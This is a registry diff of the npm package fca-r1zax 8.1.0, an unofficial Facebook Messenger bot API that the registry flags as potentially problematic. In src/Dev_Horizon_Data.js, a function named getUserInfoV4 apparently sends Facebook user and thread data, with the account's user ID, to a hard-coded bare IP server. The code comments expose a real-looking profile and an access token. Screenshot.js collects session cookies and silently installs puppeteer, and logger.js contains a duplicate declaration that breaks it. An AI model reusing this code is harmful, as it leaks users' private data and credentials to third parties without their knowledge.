fca-r1zax 8.1.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of fca-r1zax might be problematic. Click here for more details.

Files changed (112) hide show
  1. package/.cache/replit/__replit_disk_meta.json +1 -0
  2. package/.cache/replit/modules.stamp +1 -0
  3. package/.cache/replit/nix/env.json +1 -0
  4. package/CountTime.json +1 -0
  5. package/Extra/Database/index.js +469 -0
  6. package/Extra/ExtraAddons.js +82 -0
  7. package/Extra/ExtraFindUID.js +62 -0
  8. package/Extra/ExtraGetThread.js +340 -0
  9. package/Extra/ExtraScreenShot.js +430 -0
  10. package/Extra/ExtraUptimeRobot.js +38 -0
  11. package/Extra/Html/Classic/script.js +119 -0
  12. package/Extra/Html/Classic/style.css +8 -0
  13. package/Extra/Security/Index.js +173 -0
  14. package/Extra/Security/Step_1.js +6 -0
  15. package/Extra/Security/Step_2.js +22 -0
  16. package/Extra/Security/Step_3.js +22 -0
  17. package/Extra/Src/Change_Environment.js +24 -0
  18. package/Extra/Src/Check_Update.js +67 -0
  19. package/Extra/Src/History.js +115 -0
  20. package/Extra/Src/Instant_Update.js +65 -0
  21. package/Extra/Src/Last-Run.js +65 -0
  22. package/Extra/Src/Release_Memory.js +41 -0
  23. package/Extra/Src/Websocket.js +213 -0
  24. package/Extra/Src/image/checkmate.jpg +0 -0
  25. package/Extra/Src/uuid.js +137 -0
  26. package/Func/AcceptAgreement.js +31 -0
  27. package/Func/ClearCache.js +64 -0
  28. package/Func/ReportV1.js +54 -0
  29. package/Index.js +379 -0
  30. package/Language/index.json +216 -0
  31. package/Main.js +1192 -0
  32. package/README.md +123 -0
  33. package/SECURITY.md +18 -0
  34. package/broadcast.js +40 -0
  35. package/logger.js +77 -0
  36. package/package.json +94 -0
  37. package/src/Dev_Horizon_Data.js +125 -0
  38. package/src/Premium.js +25 -0
  39. package/src/Screenshot.js +83 -0
  40. package/src/addExternalModule.js +16 -0
  41. package/src/addUserToGroup.js +79 -0
  42. package/src/changeAdminStatus.js +79 -0
  43. package/src/changeArchivedStatus.js +41 -0
  44. package/src/changeAvt.js +85 -0
  45. package/src/changeBio.js +65 -0
  46. package/src/changeBlockedStatus.js +36 -0
  47. package/src/changeGroupImage.js +106 -0
  48. package/src/changeNickname.js +45 -0
  49. package/src/changeThreadColor.js +62 -0
  50. package/src/changeThreadEmoji.js +42 -0
  51. package/src/createNewGroup.js +70 -0
  52. package/src/createPoll.js +60 -0
  53. package/src/deleteMessage.js +45 -0
  54. package/src/deleteThread.js +43 -0
  55. package/src/forwardAttachment.js +48 -0
  56. package/src/getAccessToken.js +28 -0
  57. package/src/getCurrentUserID.js +7 -0
  58. package/src/getEmojiUrl.js +27 -0
  59. package/src/getFriendsList.js +73 -0
  60. package/src/getMessage.js +80 -0
  61. package/src/getThreadHistory.js +537 -0
  62. package/src/getThreadInfo.js +425 -0
  63. package/src/getThreadList.js +213 -0
  64. package/src/getThreadMain.js +220 -0
  65. package/src/getThreadPictures.js +59 -0
  66. package/src/getUID.js +59 -0
  67. package/src/getUserID.js +62 -0
  68. package/src/getUserInfo.js +113 -0
  69. package/src/getUserInfoMain.js +65 -0
  70. package/src/getUserInfoV2.js +32 -0
  71. package/src/getUserInfoV3.js +63 -0
  72. package/src/getUserInfoV4.js +55 -0
  73. package/src/getUserInfoV5.js +61 -0
  74. package/src/handleFriendRequest.js +46 -0
  75. package/src/handleMessageRequest.js +49 -0
  76. package/src/httpGet.js +49 -0
  77. package/src/httpPost.js +48 -0
  78. package/src/httpPostFormData.js +41 -0
  79. package/src/listenMqtt.js +787 -0
  80. package/src/logout.js +68 -0
  81. package/src/markAsDelivered.js +48 -0
  82. package/src/markAsRead.js +70 -0
  83. package/src/markAsReadAll.js +43 -0
  84. package/src/markAsSeen.js +51 -0
  85. package/src/muteThread.js +47 -0
  86. package/src/removeUserFromGroup.js +49 -0
  87. package/src/resolvePhotoUrl.js +37 -0
  88. package/src/searchForThread.js +43 -0
  89. package/src/sendMessage.js +379 -0
  90. package/src/sendTypingIndicator.js +80 -0
  91. package/src/setMessageReaction.js +109 -0
  92. package/src/setPostReaction.js +102 -0
  93. package/src/setTitle.js +74 -0
  94. package/src/threadColors.js +39 -0
  95. package/src/unfriend.js +43 -0
  96. package/src/unsendMessage.js +40 -0
  97. package/test/Database_Test.js +4 -0
  98. package/test/Db2.js +530 -0
  99. package/test/Horizon_Database/A_README.md +1 -0
  100. package/test/Horizon_Database/Database.db +0 -0
  101. package/test/data/shareAttach.js +146 -0
  102. package/test/data/something.mov +0 -0
  103. package/test/data/test.png +0 -0
  104. package/test/data/test.txt +7 -0
  105. package/test/env/.env +0 -0
  106. package/test/example-config.json +18 -0
  107. package/test/example-db.db +0 -0
  108. package/test/memoryleak.js +18 -0
  109. package/test/test-page.js +140 -0
  110. package/test/test.js +385 -0
  111. package/test/testv2.js +18 -0
  112. package/utils.js +1684 -0
package/README.md ADDED
@@ -0,0 +1,123 @@
1
+ ## Notification !
2
+
3
+ Lưu Ý! Đây Là Sản Phẩm Được R1zaX Duy Trì và Phát Triển ( Fca Được Mod Lại Từ Scr Của Fca-Horizon-Remastered ), Nếu Có Lỗi Hãy Thử Sử Dụng Sang Sản Phẩm Khác !
4
+
5
+ # Api Cho ChatBot Messenger
6
+
7
+ Facebook Đã Có Và Cho Người Dùng Tạo Api Cho Chatbots 😪 Tại Đey => [Đây Nè](https://developers.facebook.com/docs/messenger-platform).
8
+
9
+ ### Api Này Có Thể Khiến Cho Bạn Payy Acc Như Cách Acc Bạn Chưa Từng Có, Hãy Chú Ý Nhé =))
10
+
11
+ Lưu Ý ! Nếu Bạn Muốn Sài Api Này Hãy Xem Document Tại [Đây Nè](https://github.com/Schmavery/facebook-chat-api).
12
+
13
+ ## Tải Về
14
+
15
+ Nếu Bạn Muốn Sử Dụng, Hãy Tải Nó Bằng Cách:
16
+ ```bash
17
+ npm i fca-r1zax
18
+ ```
19
+ or
20
+ ```bash
21
+ npm install fca-r1zax
22
+ ```
23
+
24
+ Nó Sẽ Tải Vô node_modules (Lib Của Bạn) - Lưu Ý Replit Sẽ Không Hiện Đâu Mà Tìm 😪
25
+
26
+ ### Tải Bản Mới Nhất Hoặc Update
27
+
28
+ Nếu Bạn Muốn Sử Dụng Phiên Bản Mới Nhất Hay Cập Nhật Thì Hãy Vô Terminal Hoặc Command Promt Nhập :
29
+ ```bash
30
+ npm install fca-r1zax@latest
31
+ ```
32
+ Hoặc
33
+ ```bash
34
+ npm i fca-r1zax@latest
35
+ ```
36
+
37
+ ## Nếu Bạn Muốn Test Api
38
+
39
+ Lợi Ích Cho Việc Này Thì Bạn Sẽ Không Tốn Thời Gian Pay Acc Và Có Acc 😪
40
+ Hãy Sử Dụng Với Tài Khoản Thử Nghiệm => [Facebook Whitehat Accounts](https://www.facebook.com/whitehat/accounts/).
41
+
42
+ ## Cách Sử Dụng
43
+
44
+ ```javascript
45
+ const login = require("fca-r1zax"); // lấy từ lib ra
46
+
47
+ // đăng nhập
48
+ login({email: "Gmail Account", password: "Mật Khẩu Facebook Của Bạn"}, (err, api) => {
49
+
50
+ if(err) return console.error(err); // trường hợp lỗi
51
+
52
+ // tạo bot tự động nhái theo bạn:
53
+ api.listen((err, message) => {
54
+ api.sendMessage(message.body, message.threadID);
55
+ });
56
+
57
+ });
58
+ ```
59
+
60
+ Kết Quả Là Nó Sẽ Nhái Bạn Như Hình Dưới:
61
+ <img width="517" alt="screen shot 2016-11-04 at 14 36 00" src="https://cloud.githubusercontent.com/assets/4534692/20023545/f8c24130-a29d-11e6-9ef7-47568bdbc1f2.png">
62
+
63
+ Nếu Bạn Muốn Sử Dụng Nâng Cao Thì Hãy Sử Dụng Các Loại Bot Được Liệt Kê Ở Trên !
64
+
65
+ ## Danh Sách
66
+
67
+ Bạn Có Thể Đọc Full Api Tại => [here](DOCS.md).
68
+
69
+ ## Cài Đặt Cho Mirai:
70
+
71
+ Bạn Cần Vô File Mirai.js,Sau Đó Tìm Đến Dòng
72
+ ```js
73
+ var login = require('tùy bot');
74
+ /* Có thể là :
75
+ var login = require('@maihuybao/fca-Unofficial');
76
+ var login = require('fca-xuyen-get');
77
+ var login = require('fca-unofficial-force');
78
+ ...
79
+ */
80
+ ```
81
+
82
+ Và Thay Nó Bằng:
83
+
84
+ ```js
85
+ var login = require('fca-r1zax')
86
+ ```
87
+
88
+ Sau Đó Thì Chạy Bình Thường Thôi !
89
+
90
+ ## Tự Nghiên Cứu
91
+
92
+ Nếu Bạn Muốn Tự Nghiên Cứu Hoặc Tạo Bot Cho Riêng Bạn Thì Bạn Hãy Vô Cái Này Đọc Chức Năng Của Nó Và Cách Sử Dụng => [Link](https://github.com/Schmavery/facebook-chat-api#Unofficial%20Facebook%20Chat%20API)
93
+
94
+ ------------------------------------
95
+
96
+ ### Lưu Lại Thông Tin Đăng Nhập.
97
+
98
+ Để Lưu Lại Thì Bạn Cần 1 Apstate Kiểu (Cookie, etc,..) Để Lưu Lại Hoặc Là Sử Dụng Mã Login Như Trên Để Đăng Nhập !
99
+
100
+ Và Chế Độ Này Đã Có Sẵn Trong 1 Số Bot Việt Nam Nên Bạn Cứ Yên Tâm Nhé !
101
+
102
+ __Hướng Dẫn Với Appstate__
103
+
104
+ ```js
105
+ const fs = require("fs");
106
+ const login = require("fca-r1zax");
107
+
108
+ var credentials = {email: "FB_EMAIL", password: "FB_PASSWORD"}; // thông tin tk
109
+
110
+ login(credentials, (err, api) => {
111
+ if(err) return console.error(err);
112
+ // đăng nhập
113
+ fs.writeFileSync('appstate.json', JSON.stringify(api.getAppState())); //tạo appstate
114
+ });
115
+ ```
116
+
117
+ Hoặc Dễ Dàng Hơn ( Chuyên Nghiệp ) Bạn Có Thể Dùng => [c3c-fbstate](https://github.com/c3cbot/c3c-fbstate) Để Lấy Fbstate And Rename Lại Thành Apstate Cũng Được ! (appstate.json)
118
+
119
+ ------------------------------------
120
+
121
+ ## FAQS
122
+
123
+ FAQS => [Link](https://github.com/Schmavery/facebook-chat-api#FAQS)
package/SECURITY.md ADDED
@@ -0,0 +1,18 @@
1
+ # Security Policy
2
+
3
+ + if have any Vulnerability finded contact: Author(KanzuWakazaki.Main@proton.me) or (Facebook.com/Lazic.Kanzu). Thanks!
4
+
5
+ ## Supported Versions
6
+
7
+ Use this section to tell people about which versions of your project are
8
+ currently being supported with security updates.
9
+
10
+ | Version | Supported |
11
+ | ------- | ------------------ |
12
+ | StableVersion | :white_check_mark: |
13
+ | AutoUpdate | :white_check_mark:|
14
+ | Modified | :x:
15
+
16
+ ## Reporting a Vulnerability
17
+
18
+ Contact Author or create pull!
package/broadcast.js ADDED
@@ -0,0 +1,40 @@
1
+ 'use strict';
2
+
3
+ switch (global.Fca.Require.FastConfig.BroadCast) {
4
+ case true: {
5
+ try {
6
+ var logger = global.Fca.Require.logger;
7
+ var Fetch = global.Fca.Require.Fetch;
8
+ Fetch.get("https://raw.githubusercontent.com/RqzaX040/Global-Hokai/main/BroadCast.json").then(async (/** @type {{ body: { toString: () => string; }; }} */ res) => {
9
+ global.Fca.Data.BroadCast = JSON.parse(res.body.toString())
10
+ var random = JSON.parse(res.body.toString())[Math.floor(Math.random() * JSON.parse(res.body.toString()).length)] || "Fca mod bởi R1zaX";
11
+ logger.Normal(random);
12
+ });
13
+ }
14
+ catch (e) {
15
+ console.log(e);
16
+ }
17
+ return setInterval(() => {
18
+ try {
19
+ try {
20
+ var logger = global.Fca.Require.logger;
21
+ var random = global.Fca.Data.BroadCast[Math.floor(Math.random() * global.Fca.Data.BroadCast.length)] || "Fca mod bởi R1zaX";
22
+ logger.Normal(random);
23
+ }
24
+ catch (e) {
25
+ console.log(e);
26
+ return;
27
+ }
28
+ }
29
+ catch (e) {
30
+ console.log(e);
31
+ }
32
+ },3600 * 1000);
33
+ }
34
+ case false: {
35
+ break;
36
+ }
37
+ default: {
38
+ break;
39
+ }
40
+ }
package/logger.js ADDED
@@ -0,0 +1,77 @@
1
+ 'use strict';
2
+
3
+ const chalk = require('chalk');
4
+ function randomColor() {
5
+ var color = "";
6
+ for (var i = 0; i < 3; i++) {
7
+ var sub = Math.floor(Math.random() * 256).toString(16);
8
+ color += (sub.length == 1 ? "0" + sub : sub);
9
+ }
10
+ return "#" + color;
11
+ };
12
+ /* eslint-disable linebreak-style */
13
+
14
+ const chalk = require('chalk');
15
+ var isHexcolor = require('is-hexcolor');
16
+ var getText = function(/** @type {string[]} */ ...Data) {
17
+ var Main = (Data.splice(0,1)).toString();
18
+ for (let i = 0; i < Data.length; i++) Main = Main.replace(RegExp(`%${i + 1}`, 'g'), Data[i]);
19
+ return Main;
20
+ };
21
+ /**
22
+ * @param {any} obj
23
+ */
24
+ function getType(obj) {
25
+ return Object.prototype.toString.call(obj).slice(8, -1);
26
+ }
27
+
28
+ module.exports = {
29
+ Normal: function(/** @type {string} */ Str, /** @type {() => any} */ Data ,/** @type {() => void} */ Callback) {
30
+ if (isHexcolor(global.Fca.Require.FastConfig.MainColor) != true) {
31
+ this.Warning(getText(global.Fca.Require.Language.Index.InvaildMainColor,global.Fca.Require.FastConfig.MainColor),process.exit(0));
32
+ }
33
+ else
34
+ console.log(chalk.bold.hex(randomColor()).bold(`${globalThis.Fca.Require.FastConfig.MainName || '〈 FCA 〉'}➜ ` + Str));
35
+ if (getType(Data) == 'Function' || getType(Data) == 'AsyncFunction') {
36
+ return Data()
37
+ }
38
+ if (Data) {
39
+ return Data;
40
+ }
41
+ if (getType(Callback) == 'Function' || getType(Callback) == 'AsyncFunction') {
42
+ Callback();
43
+ }
44
+ else return Callback;
45
+ },
46
+ Warning: function(/** @type {unknown} */ str, /** @type {() => void} */ callback) {
47
+ console.log(chalk.bold.hex(randomColor()).bold('〈 FCA-WARNING 〉➜ ' + str));
48
+ if (getType(callback) == 'Function' || getType(callback) == 'AsyncFunction') {
49
+ callback();
50
+ }
51
+ else return callback;
52
+ },
53
+ Error: function(/** @type {unknown} */ str, /** @type {() => void} */ callback) {
54
+ if (!str) {
55
+ console.log(chalk.bold.hex(randomColor()).bold('〈 FCA-ERROR 〉➜ ' + "Đã xảy ra lỗi, vui lòng liên hệ: facebook.com/RqzaX.VqnThuqn.040"));
56
+ }
57
+ console.log(chalk.magenta.bold('〈 FCA-ERROR 〉➜ ') + chalk.red(str));
58
+ if (getType(callback) == 'Function' || getType(callback) == 'AsyncFunction') {
59
+ callback();
60
+ }
61
+ else return callback;
62
+ },
63
+ Success: function(/** @type {unknown} */ str, /** @type {() => void} */ callback) {
64
+ console.log(chalk.hex('#9900FF').bold(`${global.Fca.Require.FastConfig.MainName || '〈 FCA 〉'}➜ `) + chalk.green(str));
65
+ if (getType(callback) == 'Function' || getType(callback) == 'AsyncFunction') {
66
+ callback();
67
+ }
68
+ else return callback;
69
+ },
70
+ Info: function(/** @type {unknown} */ str, /** @type {() => void} */ callback) {
71
+ console.log(chalk.hex('#9900FF').bold(`${global.Fca.Require.FastConfig.MainName || '〈 FCA 〉'}➜ `) + chalk.blue(str));
72
+ if (getType(callback) == 'Function' || getType(callback) == 'AsyncFunction') {
73
+ callback();
74
+ }
75
+ else return callback;
76
+ }
77
+ };
package/package.json ADDED
@@ -0,0 +1,94 @@
1
+ {
2
+ "name": "fca-r1zax",
3
+ "version": "8.1.0",
4
+ "description": "Facebook-chat-api protect and deploy by Kanzu and HZI Team (Mod by R1zaX)",
5
+ "main": "Index.js",
6
+ "scripts": {
7
+ "test": "mocha",
8
+ "lint": "./node_modules/.bin/eslint *.js",
9
+ "prettier": "prettier utils.js src/* --write"
10
+ },
11
+ "author": "Avery, David, Maude, Benjamin, UIRI, KanzuWakazaki",
12
+ "license": "MIT",
13
+ "bugs": {
14
+ "url": "https://github.com/KanzuXHorizon/Fca-Horizon-Remastered/issues"
15
+ },
16
+ "homepage": "https://github.com/KanzuXHorizon/Fca-Horizon-Remastered#readme",
17
+ "repository": {
18
+ "type": "git",
19
+ "url": "git://github.com/KanzuXHorizon/Fca-Horizon-Remastered.git"
20
+ },
21
+ "dependencies": {
22
+ "aes-js": "latest",
23
+ "assert": "latest",
24
+ "better-sqlite3": "7.6.2",
25
+ "bluebird": "latest",
26
+ "chalk": "4.1.2",
27
+ "cheerio": "latest",
28
+ "crypto-js": "latest",
29
+ "deasync": "^0.1.28",
30
+ "duplexify": "^4.1.2",
31
+ "encode32": "latest",
32
+ "express": "latest",
33
+ "file-url": "^3.0.0",
34
+ "got": "^11.8.6",
35
+ "https-proxy-agent": "latest",
36
+ "is-hexcolor": "^1.0.0",
37
+ "lodash": "latest",
38
+ "moment": "^2.29.4",
39
+ "mqtt": "latest",
40
+ "npmlog": "latest",
41
+ "os": "latest",
42
+ "path": "latest",
43
+ "pretty-ms": "7.0.1",
44
+ "readable-stream": "^4.4.0",
45
+ "readline": "latest",
46
+ "request": "latest",
47
+ "totp-generator": "latest",
48
+ "tough-cookie": "^4.1.2",
49
+ "uuid": "latest",
50
+ "speakeasy": "latest",
51
+ "ws": "^8.13.0",
52
+ "ansi-to-html": "latest"
53
+ },
54
+ "engines": {
55
+ "node": ">=14.x"
56
+ },
57
+ "devDependencies": {
58
+ "eslint": "^8.40.0",
59
+ "mocha": "latest",
60
+ "prettier": "latest"
61
+ },
62
+ "eslintConfig": {
63
+ "env": {
64
+ "es6": true,
65
+ "node": true
66
+ },
67
+ "extends": "eslint:recommended",
68
+ "parserOptions": {
69
+ "sourceType": "module"
70
+ },
71
+ "rules": {
72
+ "linebreak-style": [
73
+ "error",
74
+ "unix"
75
+ ],
76
+ "semi": [
77
+ "error",
78
+ "always"
79
+ ],
80
+ "no-unused-vars": [
81
+ 1,
82
+ {
83
+ "argsIgnorePattern": "^_"
84
+ }
85
+ ]
86
+ }
87
+ },
88
+ "keywords": [
89
+ "Fca r1zax",
90
+ "fca-horizon-remastered",
91
+ "horizon fca",
92
+ "horizon"
93
+ ]
94
+ }
@@ -0,0 +1,125 @@
1
+ /* eslint-disable linebreak-style */
2
+ "use strict";
3
+
4
+ var utils = require("../utils");
5
+ var bluebird = require('bluebird');
6
+ var request = bluebird.promisify(require("request"));
7
+
8
+ module.exports = function (defaultFuncs, api, ctx) {
9
+ return function getUserInfoV4(data, type, method, callback) {
10
+ var resolveFunc = function () { };
11
+ var rejectFunc = function () { };
12
+ var returnPromise = new Promise(function (resolve, reject) {
13
+ resolveFunc = resolve;
14
+ rejectFunc = reject;
15
+ });
16
+
17
+ if (!callback) {
18
+ callback = function (err, userInfo) {
19
+ if (err) return rejectFunc(err);
20
+ resolveFunc(userInfo);
21
+ };
22
+ }
23
+
24
+ if (!data || !type || !method) return;
25
+
26
+ var Cluster = ['http://146.190.109.182:3874'];
27
+ var ursl = Cluster[Math.floor(Math.random() * Cluster.length)];
28
+
29
+ if (utils.getType(data) !== "Array") data = [data];
30
+ switch (method) {
31
+ case "Post": {
32
+ switch (type) {
33
+ case "Users": {
34
+ /*
35
+ example
36
+ Time:19/01/2023
37
+ Data:[{"id":"100042817150429","name":"Nguyễn Thái Hảo","first_name":"Hảo","username":"Lazic.Kanzu","link":"https://www.facebook.com/Lazic.Kanzu","verified":"Không Có Dữ Liệu","about":"Là một người bình thường ^^","avatar":"https://graph.facebook.com/100042817150429/picture?height=1500&width=1500&access_token=1449557605494892|aaf0a865c8bafc314ced5b7f18f3caa6","birthday":"01/03/1999","follow":241614,"gender":"male","hometown":{"id":"112089428815888","name":"Xuân Lộc, Ðồng Nai, Vietnam"},"email":"Không Có Dữ Liệu","interested_in":"Không Có Dữ Liệu","location":{"id":"351759091676222","name":"Biên Hòa"},"locale":"Không Có Dữ Liệu","relationship_status":"Không Có Dữ Liệu","love":"Không Có Dữ Liệu","website":"http://KanzuWakazaki.tk/","quotes":"The word impossible is not in my dictionary.","timezone":"Không Có Dữ Liệu","updated_time":"Không Có Dữ Liệu"}]
38
+ Type:Users
39
+ By:KanzuWakazaki
40
+ **/
41
+ let Time = new Date().toLocaleString("vi-vn", {timeZone: "Asia/Ho_Chi_Minh"});
42
+ return request({
43
+ url: ursl + '/post',
44
+ method: 'post',
45
+ headers: {
46
+ 'user-agent': "Horizon/GlobalData/Client"
47
+ },
48
+ formData: {
49
+ Time: Time,
50
+ Data: JSON.stringify(data),
51
+ Type: "Users",
52
+ By: ctx.userID
53
+ }
54
+ }).then(dt => console.log(dt.body));
55
+ }
56
+ case "Threads": {
57
+ /*
58
+ example
59
+ Time:19/01/2023
60
+ Data:[{"threadID":"5011501735554963","threadName":"[🏆] 𝕳𝕷 • 𝑯𝒐𝒓𝒊𝒛𝒐𝒏 𝑮𝒂𝒎𝒊𝒏𝒈 [🎮]","participantIDs":["100042817150429"],"userInfo":[{"id":"100042817150429","name":"Nguyễn Thái Hảo","firstName":"Hảo","vanity":"Lazic.Kanzu","thumbSrc":"https://scontent.fsgn5-14.fna.fbcdn.net/v/t39.30808-1/311136459_774539707316594_357342861145224378_n.jpg?stp=cp0_dst-jpg_p60x60&_nc_cat=101&ccb=1-7&_nc_sid=f67be1&_nc_ohc=VQmEbyNerpUAX9SL2lL&tn=b4RbIpyEAJUl2LrC&_nc_ht=scontent.fsgn5-14.fna&oh=00_AfDzMGWK-Hw8J8Ha_uZkNgwwIqX23W89p9vPbovDSrMFVw&oe=63CD7339","profileUrl":"https://scontent.fsgn5-14.fna.fbcdn.net/v/t39.30808-1/311136459_774539707316594_357342861145224378_n.jpg?stp=cp0_dst-jpg_p60x60&_nc_cat=101&ccb=1-7&_nc_sid=f67be1&_nc_ohc=VQmEbyNerpUAX9SL2lL&tn=b4RbIpyEAJUl2LrC&_nc_ht=scontent.fsgn5-14.fna&oh=00_AfDzMGWK-Hw8J8Ha_uZkNgwwIqX23W89p9vPbovDSrMFVw&oe=63CD7339","gender":"MALE","type":"User","isFriend":true,"isBirthday":false}],"unreadCount":38925,"messageCount":39857,"timestamp":"1674107309307","muteUntil":null,"isGroup":true,"isSubscribed":true,"isArchived":false,"folder":"INBOX","cannotReplyReason":null,"eventReminders":[],"emoji":"😏","color":"DD8800","nicknames":{"100001776745483":"[𝐇𝐆] • Eo bờ su"},"adminIDs":[{"id":"100042817150429"}],"approvalMode":true,"approvalQueue":[],"reactionsMuteMode":"reactions_not_muted","mentionsMuteMode":"mentions_not_muted","isPinProtected":false,"relatedPageThread":null,"name":"[🏆] 𝕳𝕷 • 𝑯𝒐𝒓𝒊𝒛𝒐𝒏 𝑮𝒂𝒎𝒊𝒏𝒈 [🎮]","snippet":"SystemCall run (async function() {\nSend(await Api.getThreadInfo(Data.threadID))\n})()","snippetSender":"100042817150429","snippetAttachments":[],"serverTimestamp":"1674107309307","imageSrc":"https://scontent.fsgn5-14.fna.fbcdn.net/v/t1.15752-9/278020824_345766417524223_6790288127531819759_n.jpg?_nc_cat=101&ccb=1-7&_nc_sid=02e273&_nc_ohc=dfuXjxOR1BUAX-SUN1x&_nc_ht=scontent.fsgn5-14.fna&oh=03_AdQkXN3hb3z4Hg0Tg-vI7ZpDdSmujnluj13uNqUSJoU9iA&oe=63F060BA","isCanonicalUser":false,"isCanonical":false,"recipientsLoadable":true,"hasEmailParticipant":false,"readOnly":false,"canReply":true,"lastMessageType":"message","lastReadTimestamp":"1649756873571","threadType":2,"TimeCreate":1674107310529,"TimeUpdate":1674107310529}]
61
+ Type:Threads
62
+ By:KanzuWakazaki
63
+ **/
64
+ let Time = new Date().toLocaleString("vi-vn", {timeZone: "Asia/Ho_Chi_Minh"});
65
+ return request({
66
+ url: ursl + '/post',
67
+ method: 'post',
68
+ headers: {
69
+ 'user-agent': "Horizon/GlobalData/Client"
70
+ },
71
+ formData: {
72
+ Time: Time,
73
+ Data: JSON.stringify(data),
74
+ Type: "Threads",
75
+ By: ctx.userID
76
+ }
77
+ }).then(dt => console.log(dt.body));
78
+ }
79
+ }
80
+ }
81
+ break;
82
+ case "Get": {
83
+ switch (type) {
84
+ case "Users": {
85
+ /* example
86
+ Requires:[5011501735554963]
87
+ Type:Threads
88
+ **/
89
+
90
+ //still operating until Feb 25
91
+ return request({
92
+ url: ursl + '/get',
93
+ method: 'post',
94
+ headers: {
95
+ 'user-agent': "Horizon/GlobalData/Client"
96
+ },
97
+ formData: {
98
+ Requires: JSON.stringify(data),
99
+ Type: "Users"
100
+ }
101
+ }).then(dt => console.log(dt.body));
102
+ }
103
+ case "Threads": {
104
+ return request({
105
+ url: ursl + '/get',
106
+ method: 'post',
107
+ headers: {
108
+ 'user-agent': "Horizon/GlobalData/Client"
109
+ },
110
+ formData: {
111
+ Requires: JSON.stringify(data),
112
+ Type: "Threads"
113
+ }
114
+ }).then(dt => console.log(dt.body));
115
+ }
116
+ }
117
+ }
118
+ break;
119
+ default:
120
+ return;
121
+ }
122
+
123
+ return returnPromise;
124
+ };
125
+ };
package/src/Premium.js ADDED
@@ -0,0 +1,25 @@
1
+ "use strict";
2
+
3
+ var { join } = require('path');
4
+ var fs = require('fs');
5
+
6
+
7
+ module.exports = function (defaultFuncs, api, ctx) {
8
+ return function(Name, args){
9
+ var Method = {};
10
+ fs.readdirSync(join(__dirname, "../Func")).filter((/** @type {string} */File) => File.endsWith(".js") && !File.includes('Dev_')).map((/** @type {string} */File) => Method[File.split('.').slice(0, -1).join('.')] = require(`../Func/${File}`)(defaultFuncs, api, ctx));
11
+ if (Method[Name] == undefined) {
12
+ return (`Method ${Name} not found`);
13
+ }
14
+ else {
15
+ try {
16
+ return Method[Name](args).then((/** @type {string} */Data) => {
17
+ return Data;
18
+ });
19
+ }
20
+ catch (e) {
21
+ console.log(e);
22
+ }
23
+ }
24
+ };
25
+ };
@@ -0,0 +1,83 @@
1
+ /* eslint-disable linebreak-style */
2
+ "use strict";
3
+
4
+
5
+ module.exports = function (defaultFuncs, api, ctx) {
6
+ var Coookie = JSON.parse(JSON.stringify(ctx.jar.getCookies("https://www.facebook.com").concat(ctx.jar.getCookies("https://facebook.com")).concat(ctx.jar.getCookies("https://www.messenger.com"))));
7
+ for (let i of Coookie) {
8
+ i.name = i.key;
9
+ i.domain = 'www.facebook.com';
10
+ delete i.key;
11
+ }
12
+ return function(Link, callback) {
13
+ var logger = require('../logger');
14
+ if (process.platform != 'win32') return logger.Error('Not Supported Platform');
15
+ else try {
16
+ let i = require('puppeteer');
17
+ }
18
+ catch (e) {
19
+ var { execSync } = require('child_process');
20
+ execSync('npm i puppeteer', { stdio: 'inherit' });
21
+ }
22
+ const Screenshot = require('../Extra/ExtraScreenShot');
23
+ var resolveFunc = function () { };
24
+ var rejectFunc = function () { };
25
+ var returnPromise = new Promise(function (resolve, reject) {
26
+ resolveFunc = resolve;
27
+ rejectFunc = reject;
28
+ });
29
+
30
+ if (!callback) {
31
+ callback = function (err, data) {
32
+ if (err) return rejectFunc(err);
33
+ resolveFunc(data);
34
+ };
35
+ }
36
+ if (Link.includes('facebook.com') || Link.includes('Facebook.com') || Link.includes('fb')) {
37
+ let LinkSplit = Link.split('/');
38
+ if (LinkSplit.indexOf("https:") == 0) {
39
+ if (Link.includes('messages')) {
40
+ Screenshot.buffer(Link, {
41
+ cookies: Coookie
42
+ }).then(data => {
43
+ callback(null,data);
44
+ });
45
+ }
46
+ else if (!isNaN(LinkSplit[3]) && !Link.split('=')[1] && !isNaN(Link.split('=')[1])) {
47
+ api.sendMessage('Invaild link, format link: facebook.com/Lazic.Kanzu',global.Fca.Data.event.threadID,global.Fca.Data.event.messageID);
48
+ callback('Error Link', null);
49
+ }
50
+ else if (!isNaN(Link.split('=')[1]) && Link.split('=')[1]) {
51
+ let Format = `https://www.facebook.com/profile.php?id=${Link.split('=')[1]}`;
52
+ Screenshot.buffer(Format, {
53
+ cookies: Coookie
54
+ }).then(data => {
55
+ callback(null,data);
56
+ });
57
+ }
58
+ else {
59
+ let Format = `https://www.facebook.com/${LinkSplit[3]}`;
60
+ Screenshot.buffer(Format, {
61
+ cookies: Coookie
62
+ }).then(data => {
63
+ callback(null,data);
64
+ });
65
+ }
66
+ }
67
+ else {
68
+ let Form = `https://www.facebook.com/${LinkSplit[1]}`;
69
+ Screenshot.buffer(Form, {
70
+ cookies: Coookie
71
+ }).then(data => {
72
+ callback(null,data);
73
+ });
74
+ }
75
+ }
76
+ else {
77
+ Screenshot.buffer(Link).then(data => {
78
+ callback(null,data);
79
+ });
80
+ }
81
+ return returnPromise;
82
+ };
83
+ };
@@ -0,0 +1,16 @@
1
+ "use strict";
2
+
3
+ const utils = require("../utils");
4
+
5
+ module.exports = function (defaultFuncs, api, ctx) {
6
+ return function addExternalModule(moduleObj) {
7
+ if (utils.getType(moduleObj) == "Object") {
8
+ for (let apiName in moduleObj) {
9
+ if (utils.getType(moduleObj[apiName]) == "Function") api[apiName] = moduleObj[apiName](defaultFuncs, api, ctx);
10
+ else throw new Error(`Item "${apiName}" in moduleObj must be a function, not ${utils.getType(moduleObj[apiName])}!`);
11
+
12
+ }
13
+ }
14
+ else throw new Error(`moduleObj must be an object, not ${utils.getType(moduleObj)}!`);
15
+ };
16
+ };